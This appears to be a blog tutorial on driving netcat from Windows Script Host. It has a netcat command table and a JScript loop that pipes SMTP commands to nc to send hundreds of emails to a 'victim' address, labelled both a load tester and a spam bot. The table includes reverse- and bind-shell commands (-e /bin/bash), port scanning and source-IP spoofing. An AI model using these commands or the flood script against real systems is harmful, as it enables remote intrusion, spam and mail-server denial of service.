Email Load Tester / Auto Email Sender / Spam Bot - In JScript (or VBScript)

Netcat for Windows is phenomenally powerful when driven from Windows Scripting Host!

Netcat On Windows Background

Netcat is a very powerful, open source (GPL 2) network tool that come originally from Unix. It is so powerful and easy to use that it has gained a bad reputation as a hacker tool. This is not what it was designed for, and indeed, many security professionals use it in the war against hackers.

To give you a flavour of what it can do, here is a list of some examples:

Description Command
Connect to a port on
a remote host
nc remote_host <port>
Connect to multiple
ports on a remote host
nc remote_host <port>...<port>
For example:
nc www.somecompanyasanexample.com 21 25 80
Listen on a port for
incoming connections
nc -v -l -p <port>
Connect to remote host
and serve a bash shell
nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option.
Listen on a port and
serve a bash shell
upon connect
nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option.
Port scan a remote
host
nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -i <seconds> -v -z remote_host
<port>-<port>
Pipe command output
to a netcat request
<command> | nc remote_host <port>
For example:
echo "GET / HTTP/1.0
[enter]
[enter]
"| nc www.somecompanyasanexample.com 80
Use source-routing to
connect to a port on a
remote host
nc -g <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -G flag to specify the source-routing pointer.
Spoof source IP
address
Use the -s flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address. The -s flag can be used along with most of
the commands presented in this table.
Transfer a file On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
host:
nc -v -l -p <port> > file
And run the following command on the server host:
nc -v <client_host> <port> < file

Exsead Email Sending

Now that we have seen how powerful netcat is, we can have a look at what we can do with it for scripts. I have already discussed interacting with web services using the XMLHTTP object. For sending email, there is no such ready made object to help us. However, sending email is not an especially complex matter, so we can just use netcat instead!

To do this you will first require a copy of netcat. I have a copy that runs on Windows XP http://www.nerds-central.com/CodeZips/nc111nt.zip. I did not do the port, but the credits are in the zip and it is GPL 2. Once you have nc.exe you will need to put in somewhere on the executable path (e.g. system32) or in the same directory in which you are going to run your script.

Below is a very simple example script. This should be run by cscript from the command prompt. You will have to change the address of the smtp server to one for which you have access and set the to and from email addresses, hit count and inter-hit delay to appropriate settings. This is a real script, I used it today to load test an email server!

var strExe = "nc -v smtp.myserver.co.uk 25";

var objShell = WScript.CreateObject("WScript.Shell");
var total  = 512;
var delay  = 0;
var victim = "oops@example.com";

for(var i=0;i<total;++i)
{
    var strExeIn ="HELO nerds-central.com\r\n"; 
        strExeIn+="MAIL FROM: \r\n";
        strExeIn+="RCPT TO: <"+victim+">\r\n";
        strExeIn+="DATA\r\n";
        strExeIn+="Body of email: this is an auto generated test email.\r\n";
        strExeIn+="This is "+(i+1)+" of "+total+"\r\n";
        strExeIn+=".\r\n";
        strExeIn+="QUIT\r\n";

    var objScriptExec = objShell.Exec(strExe);
    objScriptExec.StdIn.write(strExeIn);
    objScriptExec.StdIn.close();
    WScript.echo("Sending "+(i+1)+" of "+total+" to "+victim);
    WScript.echo(objScriptExec.StdOut.ReadAll());
    WScript.sleep(delay);
}

A word of warning!

This is a powerful script that is equally capable of bringing an email server to its knees or getting you thrown off the smtp server! Use with caution and DO NOT SPAM!

Doing more fancy stuff

Using the base64 encoder in the code repository (go to www.nerds-central.com and look at the scripts link on the right hand side) you can add support for attachments to the script. You could also make it pick up information on to whom to send the emails from a web service or database (via adodb). There are posts on all of these techniques hiding away in Nerds-Central!